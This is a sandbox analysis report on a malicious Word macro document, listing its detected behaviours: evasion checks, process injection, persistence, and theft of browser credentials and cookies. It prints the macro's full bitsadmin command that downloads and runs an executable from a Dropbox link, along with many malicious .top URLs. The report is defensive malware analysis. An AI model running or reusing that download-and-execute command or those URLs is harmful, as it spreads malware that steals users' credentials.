Malicious Word Doc. Uses Multiple Sandbox Evasion Techniques | VTI by Score
Try VMRay Analyzer
VTI Information
VTI Score
100 / 100
VTI Database Version 2.6
VTI Rule Match Count 94
VTI Rule Type Documents
Detected Threats
Arrow Anti Analysis Try to detect application sandbox
Possibly trying to detect "wine" by calling GetProcAddress() on "wine_get_unix_file_name".
Arrow Anti Analysis Try to detect antivirus software
Check for antivirus software via WMI query: "select * from antivirusproduct".
Arrow Anti Analysis Try to detect firewall
Check for firewall via WMI query: "select * from firewallproduct".
Arrow File System Create many files
Create above average number of files.
Arrow Injection Write into memory of another process
"c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe" modifies memory of "c:\windows\syswow64\svchost.exe"
Arrow Injection Modify control flow of another process
"c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe" creates thread in "c:\windows\syswow64\svchost.exe"
Arrow Process Create process
Create process "cmd.exe /c "waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\iuoldw.exe &start %appdata%\iuoldw.exe"".
Create process "C:\Windows\system32\waitfor.exe".
Create process "C:\Windows\system32\bitsadmin.exe".
Create process "C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe".
Create process ""C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe"".
Create process ""C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat"".
Create process "C:\Windows\SysWOW64\svchost.exe -k netsvcs".
Create process ""C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe"".
Create process ""C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat"".
Arrow File System Handle with malicious files
File "c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe" is a known malicious file.
Arrow Network Reputation URL lookup
URL "aaopsjdf.top/IQwhNdoN6/k1c-Of1YG/9PY7a/j/Hz/A6EGg" is known as malicious URL.
URL "aaopsjdf.top/yMGvio/o0sO/J9/p/TDdCp0pD/f/3Q2nAw/" is known as malicious URL.
URL "aaopsjdf.top/KJ2L/k/Ux7/H/f/h2RtGl/7s/v8/7wrSO/Q" is known as malicious URL.
URL "aaopsjdf.top/WRBw5Vr/jVQLJoZqB/sq/85o6F8/jK3/Jw" is known as malicious URL.
URL "aaopsjdf.top/wJzm/rUw/zPMR2D/vC/Z/7/oPd/0wqaGA" is known as malicious URL.
URL "aaopsjdf.top/di/vm/8tO/N/d/VEPSK/z/Z3Z/w/Cm/EHA" is known as malicious URL.
URL "aaopsjdf.top/sjtXcaxKxG/qW/w9/CdBdDN/a/W/44ra0Bi/DFA/" is known as malicious URL.
URL "aaopsjdf.top/Yjc2A8Gst/g/2/wqY_IEM-6a_ZPTl/gH/YMg" is known as malicious URL.
URL "aaopsjdf.top/IPPKGT6kjF/k1/YZGv/RoQvaE4rDg9/AunIQ" is known as malicious URL.
Arrow Network Download data
URL "https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1".
URL "aaopsjdf.top/rJpywFLn/qEw5K/MR6O/POc/7o/nJ0wa/sGw".
URL "aaopsjdf.top/Ar1DanzSs/m3/R4FdJSDs6/d5Y/uB/4CGO/Dw".
URL "aaopsjdf.top/IQwhNdoN6/k1c-Of1YG/9PY7a/j/Hz/A6EGg".
URL "aaopsjdf.top/YUEnTzeD/g1/MMP-/d/GEdm38bze8D/qFMQ/".
URL "aaopsjdf.top/3RWlxZsXKo/6VQe/PctmB8Wly8ri8y/yYLw".
URL "aaopsjdf.top/va0u0MjZ9u/rGd5J/INxHsf/X/0/Y/_RlD/X/Q/OA/".
URL "aaopsjdf.top/Uvg4D/j/3AuZ/fdpAv/ra4Kz/Gw3S/kI/A".
URL "aaopsjdf.top/yMGvio/o0sO/J9/p/TDdCp0pD/f/3Q2nAw/".
URL "aaopsjdf.top/1c2/62V7Y/NAORf7clZ/q/Cl/SPSRA".
URL "aaopsjdf.top/KJ2L/k/Ux7/H/f/h2RtGl/7s/v8/7wrSO/Q".
URL "aaopsjdf.top/up9k/r3ZwOs/ZMTfab1M/Db/0/TDZH/g".
URL "aaopsjdf.top/4Fqm5f1XYW/7kA/4P/IZa/R/cW38/83/21/S3V/Ew".
URL "aaopsjdf.top/WRBw5Vr/jVQLJoZqB/sq/85o6F8/jK3/Jw".
URL "aaopsjdf.top/wJzm/rUw/zPMR2D/vC/Z/7/oPd/0wqaGA".
URL "aaopsjdf.top/MYXYt50L/l18RCMcJRNGj_aHp0/HXQOQ".
URL "aaopsjdf.top/di/vm/8tO/N/d/VEPSK/z/Z3Z/w/Cm/EHA".
URL "aaopsjdf.top/dnoLVKjaeD/vmgm/HeV3HvyL/4/J3ey/w/y/2Pg".
URL "aaopsjdf.top/v6mlq8VpQl/rDA/k/P/cI/EIu/2_yI-/G/y/SyRTQ".
URL "aaopsjdf.top/9TzYkm/41IzC/N/hR/TcmU_ZLdnRSaLA".
URL "aaopsjdf.top/dtSYRF8h/vnIaCOF/6TPWK0Krp9g/b/YH/Q/".
URL "aaopsjdf.top/sjtXcaxKxG/qW/w9/CdBdDN/a/W/44ra0Bi/DFA/".
URL "aaopsjdf.top/bjJ0Il/u/GwDYfpQFveklLDcx/iq/qRQ".
URL "aaopsjdf.top/Yjc2A8Gst/g/2/wqY_IEM-6a_ZPTl/gH/YMg".
URL "aaopsjdf.top/IPPKGT6kjF/k1/YZGv/RoQvaE4rDg9/AunIQ".
URL "aaopsjdf.top/X8CyRU/gj4KKOFp/LKWt3avl_/H/ijD/A".
URL "www.google.com/".
Arrow Information Stealing Read system data
Readout Windows license key.
Read the Windows installation date from registry.
Arrow Persistence Install system startup script or application
Add ""C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe"" to windows startup via registry.
Arrow Anti Analysis Delay execution
One thread sleeps more than 5 minutes.
Arrow Browser Read data related to saved browser credentials
Read saved credentials for "Mozilla Firefox".
Read saved credentials for "Google Chrome".
Arrow Browser Read data related to browser cookies
Read Cookies for "Microsoft Internet Explorer".
Read Cookies for "Mozilla Firefox".
Read Cookies for "Google Chrome".
Arrow PE Execute dropped PE file
Execute dropped file "c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe".
Arrow Hide Tracks Write large data into the registry
Hide 1776 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Baywkivyl".
Hide 1776 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Omegovna".
Hide 88160 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Eteg".
Hide 200848 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Eteg".
Hide 295088 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Eteg".
Hide 516320 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Eteg".
Hide 792144 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Eteg".
Hide 803104 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Eteg".
Hide 822944 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Eteg".
Arrow Network Connect to HTTP server
URL "aaopsjdf.top/rJpywFLn/qEw5K/MR6O/POc/7o/nJ0wa/sGw".
URL "aaopsjdf.top/Ar1DanzSs/m3/R4FdJSDs6/d5Y/uB/4CGO/Dw".
URL "aaopsjdf.top/IQwhNdoN6/k1c-Of1YG/9PY7a/j/Hz/A6EGg".
URL "www.google.com/".
URL "aaopsjdf.top/YUEnTzeD/g1/MMP-/d/GEdm38bze8D/qFMQ/".
URL "aaopsjdf.top/3RWlxZsXKo/6VQe/PctmB8Wly8ri8y/yYLw".
URL "aaopsjdf.top/va0u0MjZ9u/rGd5J/INxHsf/X/0/Y/_RlD/X/Q/OA/".
URL "aaopsjdf.top/Uvg4D/j/3AuZ/fdpAv/ra4Kz/Gw3S/kI/A".
URL "aaopsjdf.top/yMGvio/o0sO/J9/p/TDdCp0pD/f/3Q2nAw/".
URL "aaopsjdf.top/1c2/62V7Y/NAORf7clZ/q/Cl/SPSRA".
URL "aaopsjdf.top/KJ2L/k/Ux7/H/f/h2RtGl/7s/v8/7wrSO/Q".
URL "aaopsjdf.top/up9k/r3ZwOs/ZMTfab1M/Db/0/TDZH/g".
URL "aaopsjdf.top/4Fqm5f1XYW/7kA/4P/IZa/R/cW38/83/21/S3V/Ew".
URL "aaopsjdf.top/WRBw5Vr/jVQLJoZqB/sq/85o6F8/jK3/Jw".
URL "aaopsjdf.top/wJzm/rUw/zPMR2D/vC/Z/7/oPd/0wqaGA".
URL "aaopsjdf.top/MYXYt50L/l18RCMcJRNGj_aHp0/HXQOQ".
URL "aaopsjdf.top/di/vm/8tO/N/d/VEPSK/z/Z3Z/w/Cm/EHA".
URL "aaopsjdf.top/dnoLVKjaeD/vmgm/HeV3HvyL/4/J3ey/w/y/2Pg".
URL "aaopsjdf.top/v6mlq8VpQl/rDA/k/P/cI/EIu/2_yI-/G/y/SyRTQ".
URL "aaopsjdf.top/9TzYkm/41IzC/N/hR/TcmU_ZLdnRSaLA".
URL "aaopsjdf.top/dtSYRF8h/vnIaCOF/6TPWK0Krp9g/b/YH/Q/".
URL "aaopsjdf.top/sjtXcaxKxG/qW/w9/CdBdDN/a/W/44ra0Bi/DFA/".
URL "aaopsjdf.top/bjJ0Il/u/GwDYfpQFveklLDcx/iq/qRQ".
URL "aaopsjdf.top/Yjc2A8Gst/g/2/wqY_IEM-6a_ZPTl/gH/YMg".
URL "aaopsjdf.top/IPPKGT6kjF/k1/YZGv/RoQvaE4rDg9/AunIQ".
URL "aaopsjdf.top/X8CyRU/gj4KKOFp/LKWt3avl_/H/ijD/A".
URL "https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1".
Arrow PE Drop PE file
Drop file "c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe".
Arrow VBA Macro Execute application
Shell OGADJTPBNNVIKR, vbHide
Arrow Process Create system object
Create nameless mutex.
Create mutex with name "9B4D68961731FE3C22DA08B640799EB6".
Create mutex with name "Sandboxie_SingleInstanceMutex_Control".
Create mutex with name "Frz_State".
Create mutex with name "C2E6ECE9938A43206F172A85684E36DB".
Create mutex with name "CEE48AFA231AB21CA6E2437DB844BAD7".
Create mutex with name "E58EFF540968A436E982FCFA1C0445A2".
Create mutex with name "B3F6E53F120A5BE5825B9C06159BB3F4".
Create mutex with name "ABC6B5B774FF9FD7F54EC277098C64EE".
Create mutex with name "1F4C22565107A34AD73CB0F585F8F77C".
Create mutex with name "20BC29E135FB9B01285187E3B5593CC8".
Create mutex with name "4786CF0F1E6E9E20640CE4A22DFFC997".
Create mutex with name "35D65C8FBCA06952705002450D6712FC".
Create mutex with name "A354992B05F4DA0EB1B4AB788E3CE988".
Create mutex with name "61AB4C4AE08220DC5911D67B8EFCF107".
Create mutex with name "F063546A5853AF5508DB5A15751DB34A".
Create mutex with name "A63A6CDA308CF3B4F10C6B82D6B9EA5B".
Create mutex with name "629BC138D148FEC80DAF76D454EF252E".
Create mutex with name "D3F6CAB61E96B029AD170EEF2C2F89C2".
Arrow OS Use encryption API
Use above average number of encryption APIs.
Arrow VBA Macro Execute macro on specific worksheet event
Execute macro on "Activate Workbook" event.
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image